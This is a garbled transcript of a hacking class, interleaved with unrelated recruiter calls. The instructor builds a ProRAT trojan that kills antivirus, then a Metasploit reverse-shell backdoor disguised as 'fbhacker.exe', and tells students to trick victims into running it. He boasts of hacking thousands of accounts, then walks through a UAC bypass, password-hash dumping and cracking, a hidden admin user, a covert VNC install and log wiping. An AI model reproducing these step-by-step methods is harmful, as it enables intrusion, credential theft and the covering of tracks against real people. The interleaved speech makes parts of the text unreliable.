So guys, as you can see, we downloaded the GNOME extract here. Now it's asking me for the password. I don't think we have the password, right? Or what the hell is this? Where is the password? Let's move to any other website. So guys, you can see you will face lots of the issues like this. It's a basic software, okay, basic remote administration tool. Even I have this, you can see right here, but the password is not sent, you can see. Can you see that, guys?
Yes, sir.
Yes, sir.
Yes, sir.
The first one, they said the password is pro, sir.
Password is pro.
Pro, PR, pro. Okay, it's open for me,
Okay.
sir.
Nice. So we'll accept it, okay? PRO. Okay, done. Okay. So we need two machines, as I said earlier. What we will do is, this is my one of my Windows 7 machine, and okay, another one I'm going to take is, let's say, Windows 10. Okay, flash machine. Let's start.
First we'll provide training for 45 days. Later we'll schedule the interviews. Once if you get the offer letter, you have to pay us 75,000. Are you interested? Yes. After receiving the offer letter only. And then we won't charge you anything. If you don't get the job, we won't charge you.
So
Online.
let
Your
me
interview
first
is for the
give the network details.
it's
See, for Trojan to work, we need network.
page
It should be in a network. Okay, so I'm going to specify network for both of these machines.
If you are
Okay,
interested,
and I'm going to disable virus, right?
solution. If you are interested, I'll send you the email. You can check the email. If you are interested, you can revert back to that email with your updated resume. Okay, are you interested in this, Suraj? Okay, sure. Just give me 1 second.
Okay,
Okay, where is the
so now I'll specify the IP.
Oh, you can come to home on Monday. Okay, Tuesday you can come on. Okay, before coming, I'll call you.
I don't need internet,
Yes, sir, it is
so I have not specified the DNS.
okay.
Okay, now Windows 7 is attacker, my friends. Windows 10 is victim. Okay, keep that noted. This is my attacker machine. So what I'm going to do is I'm say double click on ProRAD, and it will open me a window like this. Can you see this?
Yes, sir.
Yes, sir. Yes, sir.
So as I said, the very first thing is we require a network. So you see my IP is 20.7. Let's verify that I can ping Windows 10. Looks like firewall is on there. First resolve the problem with that. See. Now you might be able to get ping. Let's verify that. Okay, so this is resolved. So now we'll proceed with our tool. See what happens is I need to specify the reverse IP, means my IP address. So I'll say 192.168.20.7, which is my IP. You can give any random port, okay, and what you can do is you can say what you want, right? If you want, just say create right now first and say see, you can see there is a ProRed server. Can you see this? Click on it.
Yes,
So
sir.
it will ask you what exactly the details you want to add, right? So we'll go to, let's say, general IP, and I am not going to specify any password, right? So let's see what exactly these things are. So if you click on this, you can specify a particular message. I'll right now, just for a tag thing, I'll just print out this message. If someone clicks, it will give you this message. Melt server on install means it will delete itself. Means nobody will say like there is a virus, it won't detect. Kill antivirus on start. If there is antivirus, it will terminate that. Okay. So always check mark on all. See, this will disable the task manager, registry, MS config and all. Once you are done, if you want to bind with any other software, you can also bind that. Server extension, you can see what extension you want, exe, okay. Just, and you can also specify the icon. For example, I need a heart icon. So here it says you need a password, okay. So I can say 1 2 3 4 5 6. No need to do anything, just say create. You can see it is going to create a file, you can see right here, and one of my file is created. You can see this server. Now what I want to do is I want to transfer this to Windows 10. Okay, somehow you need to transfer the file. So what I will do is I'll just share this in the network. Everyone share. Well, I forgot to add everyone in these permissions. You can see little mistakes. Okay, and I'll say everyone now share. So now anyone can access my folder. Right, so I'll go to Windows 10 and I can access via SMB. Right, and I have the password of my machine. Somehow I need to transfer. Okay, you can give it via pen drive, anything. It's fine. I can say John's password is. Hey, come on. I hope it is 20.7. Yep. Okay, in that case, if the password is not taking, because it is a mismatch, both of the machines have the same user, right? So it is a problem. Okay, so no need to worry. I'll just switch off the password based sharing. You can say this one. Now it might be not asking the password anymore. If it's still asking, might be we have some more options to set. Just scroll down, scroll down, scroll down. Turn off, go to public. It's just off. What the hell? Oh yes. My problem. Okay, so it has users, agents, desktop, or downloads. This is the file. Just I need this server file. Okay, no need for further things. Okay, now think of it like if you get this file somehow, and by mistake or anyhow, if you have double clicked on it, you can see you got the message, means you are gone now. right? You can see it is deleted. So you won't find that something has happened. But now see what you can do. I'm just keeping both the machines side by side so you can understand what is going to happen. Close this. You have to just remember this machine. Now here you have to specify which machine is infected. 10 Windows 10 machine IP is 10, right? So I'll say connect. Not getting connected. Oh. See, lots of security, man. On which port we created, guys? Oh yeah, Windows 7 is a mess. See, guys, one sec. You can also try till then, okay?
We don't have Windows 10, sir. Not installed.
So take anything, any Windows 7, Windows XP is also fine.
Yeah, okay.
Okay, first download. It's something. It looks like some machine issue only. So now I'm ready. Let's see how it works. Okay, if it is not working, we'll see somehow. Okay, let's see what we can do. So in that case, if this is not working, my friends, what we can do is let's delete the server. Okay, I'll exchange it. Exchange it means we'll make ProRAT. It means attacker machine as Windows 10. Okay, and I'll enter ProRAT here. Let's see. See, it is unknown publisher and all issues. And I'll create here. Create role server general. I'll specify port as, let's say, 4444. Okay. Okay. No, I'm not doing any change here. You can see easily. I'm just clicking on server. You can see it is clicking it. Server has been created. Okay. Close this. Okay. Now, okay. So now refresh it. And where is the server, man? Okay. So I'll just copy the server to the shared folder, right, which we have like here, and I'll add that shared folder here and I'll paste it here, copy. I'm not going through, this is not the one which I wanted, right? We created another one, right, without that the logo. See, the logo is different. I'll say copy and I'll say paste here. Okay, never mind. See, the logo is different. Double click on it. You see, it is melted. Guys, can you see here? Guys, hello, hello.
Yes, sir.
Yeah. It is like very basic practical, okay. So it is connecting. If this software won't work, just don't worry. We'll check out any other. Okay. So don't be in attention. Many times it happens, right? So let's also, as it is creating issues for us, let me show you dark comment if I can find somewhere, right? Oh yes. I have not specified the DNS. Who knows, that might be also an issue. See, you can take, see, darkcommentred.com is also a website. A huge thing. Go to GitHub. You can download it from there. Right? You can see a lot. But it should work, man. Why it is?
After receiving the offer letter, you need to pay us around 75,000. Currently, we are hiring for testing and sales roles. Okay, fine.
Some type of blocking is happening. I'm very much sure now. Okay, so let's do one thing. I'm closing Windows 10. Let's not use Windows 10, right? And let me give you and show you some advanced attack. Will that be fine, guys? You want to see any advanced attack for malware?
Yes, sir.
Yes, sir. Yes, sir.
These all are pretty cheap attacks, believe me. As now these tools are actually creating some issues for us. I am now going to show you the advanced one because I don't like such Jandu softwares. Right? Let's start Kali, and I'll show you how to create advanced malware and how to hack like a pro. Okay? You don't need any tool, bro. Okay? Bro, mute yourself. Anyone have a railway ticket experience? Means, do you know how to, after ticket booking, how to change name in the ticket? Something?
No, sir.
Sir, where did you book, sir? In IRCTC or somewhere else, sir?
IRCTC.
I
I was
actually
tried
name.
I was
Yeah, okay.
tried with Paytm. So it was
Yeah,
after
okay.
payment also it was stuck. Okay, means my payment was deducted, but still the ticket was not booked. After 30,
Yeah,
40 minutes, right, they refund saying
yeah, okay,
like
sir.
ticket is not available. So I visited IRCTC. I saw there are hundreds of tickets available, and still Paytm is just faking me. So I booked again as I got the refund.
Yes,
But
sir. Paytm is some delay.
yeah, but in hurry, I did a
Yeah, okay.
spelling mistake in one of the ticket. So I want to rename or they will create an issue, right?
No, sir, spelling mistake. One letter or complete name, sir.
One letter.
So no, don't ask for any Aadhaar card or any others, sir. Just they will confirm the name is correct or not. I mean, if they will say the name, or otherwise they will say only ticket number, sir. I mean, seat number. They will ask who is this, like that, sir. Maybe actually we cannot change name. We can change our boarding location, sir. Just.
Uh-huh. Okay, let's see. Man, 6,000 rupees ticket. Oh, hell. Okay. So the very first thing is you should have a network. Okay. So you can see 20.7 I am able to ping. So guys, how to create and work with Metasploit. Today I'm going to introduce you with Metasploit. Metasploit actually is not at all here in your syllabus, neither any of this you can see. It is all some basic things. But I'm going to show you advanced because I don't want to waste the time and it will be very helpful for you as well. Okay. So Metasploit is a exploit framework. Have you ever heard about Metasploit? Guys, have you ever heard?
Yes, sir. We install something software, sir, before.
Hi, this is Farhat calling from Uprising Staffing Solutions. So, are you looking for a job change? Okay, currently we are hiring for the client IBM for the role mobile. You have it here for the location Bangalore. So, are you interested? Sure. And office Bangalore location. Oh, okay, thank you. Yeah, okay, fine. For this regarding continuing as for 1900, you have knowledge of Java, right? Okay, based on that, Java, currently I will be trying for Salesforce. Salesforce, yeah. Salesforce training will be given for 3 weeks, followed by an assessment. After the training is certified as advanced certification as a Salesforce developer. The certification will be free of cost. Career evaluations are forwarded to our clients like we have NBC Times, Television, Tabs, and SCL. We forward your resumes to them. They schedule interview for you. Once we get to the
Yeah, bro, what you said?
your package will start 2.5 to 4 LPA.
Hello, did you say something?
Terms after releasing the offer letter, you will be paid as 75,000 as per
No? Okay, so Meta, am I audible?
Yes, sir.
Yes, sir.
Are you audible?
Yes, sir.
So guys, Metasploit is an exploit framework. It is designed just to attack. It is an attacking framework. Okay, you can create, you can say malwares. You can create reverse shells, bind shells, and you can exploit to any vulnerability. It is very advanced. Okay, so if you want to use Metasploit, Metasploit actually uses a database. Okay, and the database name is PostgreSQL. So you need to first start the service of PostgreSQL and say start. Okay, this will start the service of the database which is used by Metasploit. Okay, then you have to say msf db to create the db and say initiate. So it will, it is, this is for the first time only. Okay, this command, once it is initiated and database is created, you never need to worry about this. I have already done, so you say the database already exists. So now to start Metasploit you can say msf console. Okay,
Hi, this is Farhat calling from Uprising Staffing
guys,
Solutions.
speak so that I can see and understand you are understanding the concept. It is very advanced, believe me.
Yes, sir.
Yes, sir.
Yes, sir.
Yes, sir.
Yeah, under the payroll of alternate activities. Okay, thank you. It's not hard. Yeah, please tell me your presentation. Yeah. So walking
So now as you can see it is started and you are inside Metasploit. You can see there are 2251 exploits available. This much auxiliary service. Auxiliary service are used to gather the information. Okay. These are post exploitation attacks. Means after attack you want to perform privilege escalation if needed. Right, to get let's say you attacked and got the normal user access, so you want to move from normal user to advanced user. Advanced means root user or administrator user. You can use this post techniques. Okay, there are 951 payloads, means malwares or the codes which you can use for attacking. 45 encoders which can be useful to bypass antivirus. 11 knobs which are used to create buffer overflow attacks. 9 evasions, right, to again bypass the antivirus. Right, so you can see how much advanced it is, and this is the old version. Okay, old means like I have not updated from last 1 or 2 months. So let's create the malware. Okay, guys, getting the point? So you cannot create malware from inside the Metasploit, right? So I have opened a new terminal and I'm going to create a malware first. So the name is MSF Venom, right? This utility is used to create a reverse shell or bind shell and attach payload inside so that you can create a backdoor. Okay, or you can say malware, whatever you feel. Okay, so the command is msf venom -p. P means payload, and as I am attacking into Windows, I need to say Windows. It is a 64-bit machine, so I'll say 64 reverse underscore TCP. Meter biter slash reverse underscore. Meter biter is a session handler, right? So that it can handle the session and I can fire and get multiple details. Okay. Now you have to specify L host. So what is L host? L host means local host. Okay, means your IP. So you can specify your IP as 192.168.20.50. Keep a note, it should be proper. So always check what is your IP, and you can see my IP is 20.50. Then you have to say L port. What is L port? L port means local port on which you are going to connect back. Means once this malware is executed, it is going to connect to this IP and this port. Okay, getting my point?
Yes, sir.
Yes, sir.
Sir.
Yes, sir.
Yes, sir.
Yes, sir.
Yes, sir.
Then we will be having -f. F is like file format bin extension. So I'll say extension will be exe. Now if, as I said on the first day, it is all platform dependent. If I want to attack into Microsoft, usually I say exe because it is very common. If I want to attack into Linux, I'll say dpkg or whatever extension he supports. If I want to attack into Mac, I can specify that extension. It is fine. All extensions are supported here. Okay, and then I'll say export to, you can see this, I'll say let's say fb hacker.exe. So this is going to create a malware with a name, malware means backdoor, with a name facebook hacker.exe. Okay, wait for a while so it can complete. and as a result you can see it is created. Okay guys, if I say ls, you can see Facebook hacker is created. Now I need to transfer this file anyhow by convincing him. So I'm going to use Python. On port 80, and now I can transfer this file to Windows 7. So somehow you can say like perform social engineering. Let's say whoever you wants to attack, let's tell him like this is a Facebook hacking software. If you want to hack into any Facebook account, you can use this software easily. Right, so anybody will be interested. I hacked into hundreds of and thousands of accounts with this. Okay, with this just basic technique. As you can see, we downloaded the Facebook hacker. You can see easily, and if somebody downloaded, I can also get the message like somebody is downloaded. Okay, nice. Now before attacking, I need to create a handler. So I'll say use Windows x64, means if I say you directly and easily, whatever you have specified here, you have to space that only. Because Metasploit don't know what type of payload you have used. Right? Then you can say show options. Every payload have some options. So you can say who is lhost, so say set lhost 192 means my IP. Specify the port, which port. So you have given the port right here, you can see. If everything is fine, right, you can say run. Show options. You can see this set. I can say exploit. Oh, sorry. My mistake. Use exploit multi handler. Okay, you have to say this. And then you can say set payload with this and show options. Set host 192.168.20.50 and then say run. So now it is listening. Just start from here, okay? From here. The upper part is just my mistake. Okay, so after going inside, what you have to do is say exploit multi-handler, set the payload, set lhost, and say run. So it is now listening on 444. So now if somebody is going to somehow, let's say somebody is just double click on it, right? He is not going to get anything. He will see, oh, some error is happening, no issues. But my friends, you got the session, right? If you wanna see, have a look. You are into that machine. Guys, get it? Understood?
Yes, sir.
Yes, sir.
Now, whatever I want, I can do. For example, I need a command prompt. I can say shell. And see, I am into the command prompt. You can see IIP config again. Who am I? Whatever you want to do, see. Right, but you see, I am not an administrator. It is Ajax user. Getting my point? So, now one step ahead. Right? Get UID command is also getting you to show which user you logged in. Okay. Note these commands, guys. Let me check if I have any notepad or something for this. No. Okay, so I'll just give you a heads up what to do. Just create step by step, guys. Number one, network should be proper. Okay, so this is the first command. Just note the first command. Okay, step by step, guys. Note the first command. This is number one. In Kali. what you have to do is use means you go inside Metasploit, so MSF console, then say use exploit hyphen multi hyphen handler. Okay, then say set payload, copy the payload from the here. Set lhost, copy lhost from here. Set lport, copy lport from here. Whatever you set, you have to just specify that. And say exploit. You can also say run. Okay, it's your choice. Now, this is tab 1. Okay. Now what you have to do is you have to open tab 2. Tab 2 means another window in Kali, right? Then wherever you created this Facebook hacker, just go there and say Python 3 minus m http dot server on port 80. So it will start the listener, means brave app server something. Now go to Windows 7, open your browser. Let's say Kali IP is 192.168.20.50. So your Windows IP is 192.168.20.7, right? So browse to 192.168.20.10. How? HTTP colon double slash like this, and download fbhacker.exe. Okay, and run fbhacker.exe. So you will get a shell in Metasploit in here in the first tab. Got it, guys? Easy? Do you think this is easy?
Yes, sir.
Yes, sir.
Yes, sir.
But it requires lots of practice. This is my day every day, 100 times of activity. Right? I do this 100 plus times in a single day.
According regarding the job opportunity, I am looking for job. Okay, currently we are hiring for, we are providing training on Salesforce and testing. Later in Salesforce
Guys, done? Guys, done?
Done, sir.
Yes, sir. So I want you to try this attack once, right now. Guys, done? Hello, hello, hello.
Yes, sir.
So now I'm going to show you the same in another attack. Now, as you can see, I have not received admin, right? It is a normal user, Ajax user, right? So I want to install something or I want to do some more things. It won't permit me, it won't allow me, right? So to check if I can, this user can get administrator, I can run the command get system. Looks like this Windows is a mess. I'll delete this Windows because I have performed lots and lots of attacks in this Windows. Okay, so you can see it is not allowing me to get the admin access. Can you see here? So definitely I need to perform privilege escalation, right? In my earlier topics we have learned that, right? So how to perform privilege escalation, right? So there are lots of methods, but I'm going to show you with Metasploit because you are new to Metasploit. So you can first say background. Background command will take this particular session in background, right? It means it will going to minimize the session, and you can see how much sessions I have with sessions command. You can see right here. Okay. So now think of it Windows. If you want to run something as admin, what you do? Guys, if you want to run something as admin, what you do? You run as admin like this? Yes or no? Hello. Which service is asking you for this thing? You can see user account control means UAC. Getting my point? UAC. This is called as UAC. So let me check if I have any UAC related stuff. So I can say search UAC. And I can see there are lots of UAC related, bypass UAC related stuff as well. Right, so I can see some are excellent, some are manual. So I'll select the excellent one. Likewise, this you can see excellent. Okay, so this is the idea of this exploit number 5. So I'll say use 5. It will be automatically taken. C. Okay, show options. As I said, every attack has some options. So it requires session. So which session we have? So I'll say session set session 1, right? We have one session already running, and this is for Windows 86. So I'll search for show targets. You can see here specified exploit target. So I need to change because it is x86 means 64 32-bit. Okay. So you can see it is also allowing for 64. So I can say set target 1. 1 means this. Okay, show options to verify whether it is set. Yeah, so I can say now run. So see, it is using our first session and hacking into UAC thing, and I got the shell. Now earlier get system command was not running. Now I can see get system is running, get UID, and who am I? I am anti system authority, means this user is now having more access than admin. Right? There are 3 users. One is system account, one is administrator, and one is normal user. So this is system account, which is having more permissions than even admin. Okay. So what I can do is I can do now whatever I want in the destination machine. So what I'm going to do is, usually what I do is I take the SAM files details, right? SAM. Remember SAM file where it stores the passwords and users and all? So I say
Yes, sir.
hash dump.
Yes, sir.
So you see hash dump is not running. I say run hash dump. So it is giving me lots of Metasploit related errors, but it says there is another hash dump which is more advanced than this. So I'll just copy this and make this session is also in background. Okay, so how many sessions we have? Two, one with normal user, one with anti-system. Okay, so I'll say use post hash dump, show options, session required. So I'll say set session number 2 because it is admin, means anti-system, and I'll say run. So I got all the users. You can say username and password this hash, right? You can see easy. And it is also saying like Ajax user is having common password. Common password means weak password. Okay, so I can crack easily. Okay, so I'll say okay, bro, this is the file it's saved. So you can just copy this file name, go to the new terminal. You can say cat file name. Oh, sudo su cat file name. You can see it is copied here. So I'll just move this file to our user location, right? So that it can be easy for us. Okay, you can see this, and I'm going to rename this file because it is very lengthy, right? I'll say hash. Okay, ls. You can see hash, cat hash. Now I can how to crack this. So I can say John. There is a tool called as John the Reaper, which is used for cracking the hashes. Okay, so I'll say John and say hash. But yeah, okay, John and hash. So there are 3 users, but it didn't understood what exactly these hashes are, right? And so it don't show me the password. So how it is cracking? It is cracking with the help of a word list it already have inside. So as he don't understood the format of the hash, you can see it didn't crack. So we need to specify the format. So I say hyphen hyphen format equals to Windows 7 supports NTLM, right? So I'll say NT, and you can see this is the password. Can you see, guys? Ajax user is 12345, hacker is 123456. Guys, do you like the topic and practical?
Yes, sir.
Yes, sir.
Yes, sir.
So we remotely hacked into Windows 7, right? We perform privilege escalation. We also cracked the password. And now I can remotely connect that machine with whatever thing what I want. I have full permission, I have full access, right? Even I have the access, right? So let me show you some more advanced stuff. So we have sessions with anti-system authority. So I can say session minus I means ID. So number 2 because it is admin, right? And as I am the admin, I can get shell and I can create the user and user. Remember this command I have told you. Let's say,
Yes, sir.
uh, let's say the new user is let's say HCK. I'm just creating a random user. HCK. Password is 12345. Add. See, it is created. I'm adding this user to administrator group. So net local group administrators. Which user? HCK. Add. See, it is done. Now if you perform this hash dump again, you will see that there are 4 users. Okay. If you want to see, let me show you that as well. Okay. Exit and I'll say back. Okay. See run hash dump run. Do you think this is good?
Yes, sir.
Yes, sir.
Okay. So now we have the administrator. Now I'm going to show you some more advanced. Okay, I'm again coming to here. Now, if we have the practical, remember for spyware, where we have gone through Refog, remember? Refog,
Sir. Yes, sir.
spyware and keylogger. So let's say I want to install spyware. Now, if there is a spyware, if it is shown nearly if there is a process somewhere here or somewhere required, right? So I want to show you. Is there VNC software installed in this machine? VNC? Can you see any VNC software in the list?
No, sir.
No, right?
No, sir.
Check here as well. In the C drive, program files. Do you see any VNC software installed?
No, sir.
No, sir.
Here also.
No, sir.
So I'm going to install VNC, and that VNC software is actually used to give me the remote. Okay, means I need the GUI access. I don't know understand this CLI, right? They think it like that. I need GUI. So what I can say run VNC. So what it will do is, it is first going to install VNC in Windows 7. You can see on port number 4545 and give you a shell. And the best part is, on the remote side, the Windows 7 user will not even know that something is installed. See, there is still no VNC here, right? Nor here, not in the task manager as well. Hello. Can you see, guys? There is no even process. Hello.
No, sir.
Yeah,
Yes, sir.
And once, so you can monitor, okay, you can do whatever you want, right? You can see double click, whatever you want. And once you are done with this access, you can close it. And you know what? If you close this, it will also automatically uninstall as well. So nobody will even knew that something happened and somebody take the remote and all. Good, sounds good. So it is also doing
Yes, sir.
daisy chaining.
Yes, sir.
Okay, you can make use of help utility to see what things you can do. Right, you can see it has lots of big things. For an example, I want to clear the logs. Right, so logs are stored in where? Event viewer. Right, so let me open event viewer. Just to show you that there are lots of logs in here. Okay. See, there are 542 logs here in application, in security 380, in setup nothing, in system 1209. Right? Lots of the events are there, right? I can just say clear EV. Sorry, EV. See, it deleted 542 and these all records just in a single click. Now let's go and check whether it is there or not. So let's go to application. 0. Security. It is one log that the audit log was cleared. But who cleared? There is no details of it. See. Can you see username? Nah. In setup, nothing. In system, event log. The system log was cleared. Who cleared? System itself. Means no user. Sounds good?
Yes, sir.
Well, there are some more things you can play with. You can play any song, right? You can start recording with mic, or you can start his webcam if webcam is available in your physical machine. You can perform keylogs for keylogger, right? You can share your own screen, right? You can take the snapshot of the destination machine, right? Then you can shut down the machine. You can clear any process. You can start any process, right? See, lots of the things you can download and upload the things. You can see download is also there, upload is also there. You can create files, You can run any software. Guys, do you like this software? Means this framework.
Yes,
Yes,
sir.
sir.
Yes, sir.
Yes, sir. Very good.
So note down everything, whatever we have gone through. Now the problem is there is no history. So I'll just scroll up and up and up until you specify like you have not noted. So this we have done for privilege escalation. Okay. So starting from here. So background first of all will help you background the session. Just note everything, guys. Noted this one? Guys, do I scroll? Hello.
So, yes,
Okay, sir.
Yes, sir.
Now the next command is once you background the session to perform privilege escalation, make a heading to perform privilege escalation with Metasploit. So you can say search UAC.
We are providing training on Salesforce and Text-to-Data with JC documents. Are you interested for that? Why?
Okay, once you search UAC, you will get a list. So we'll select this fifth one. Okay, which I selected. So say use 5. Start from here. Use 5. And note down the remaining commands like show options. Guys, done?
Yes, sir.
So use 5, then you can say show options and set session 1. Then say show targets, select target 1. Guys, done?
Yes, sir.
So select target and then say run. So you will get the admin access. Specify get system to get the admin. Then start the commands from here. Guys, done. Hello. Say something, bro. How will I know you are noting or not? So after this, if you want to dump the hashes, you want to break down the session and use this particular payload. Hello, hello.
Yes, sir.
Yes, sir.
Yes.
Yes, sir. Noted this one.
Sir.
So once you are done with this, guys, just say set session 2 and run after privilege escalation. Okay. So session 2 and done. So it will give you the hashes.
Okay, you don't take any class.
Okay,
It
sir.
will be very easy. If you are interested, I'll send you the email. Please revert back to that email, and there our office address and everything will be
So once you
there
get the
on the email.
hashes, use this
Just
command
send to Andhra Pradesh,
to crack the password.
048 opposite of Axis Bank. Are you interested, Shravani? Okay. For security purpose, we will collect one your 10th class certificate. If you didn't get any job, we will give back those certificates. Okay. Within 2 months, we will provide you job. If you did not get any job, we will give back those certificates and we don't charge you anything. Yes, just 10th certificate is enough. You have to give us a hard copy for security purpose. I'll send you the address. You can visit our office. When will you come? I'll send you email now.
Okay, if you have done with this, then let's say furthermore, if you want to do some more advanced settings, means let's say you want to create user and kind of thing, you can do this commands. You can say shell, net user, net local group, this type of things.
Please confirm with your parents and please tell me, okay? Whether you're interested in it. Yeah, please respond to that email with an updated resume if you are interested. Okay, thank you, Shalini. If you have any other friends, then you can give them as well.
Guys, done? Now,
Yes, sir.
once you are done with that, if you want to get the GUI, you can say run VNC. So it will also install VNC to get the GUI shell, right? And with the and that is also with the spyware. I mean, the victim won't understand that something is installed or not. Okay, guys, done.
Yes,
If
sir.
you want to clear all the logs, this is the command. Okay, guys. So if you are done with this, I want you all to perform this thing. See, this is I have done, and I have 12 years of experience. Okay, so it was very easy for me. But believe me, it won't be easy for you when you will perform, right? So, guys, I want you to do this practical, okay, by today itself. Fine?
Okay, sir.
Okay, so that's all for the day. See you tomorrow. Okay? Bye.
Yeah.
Thank you, sir.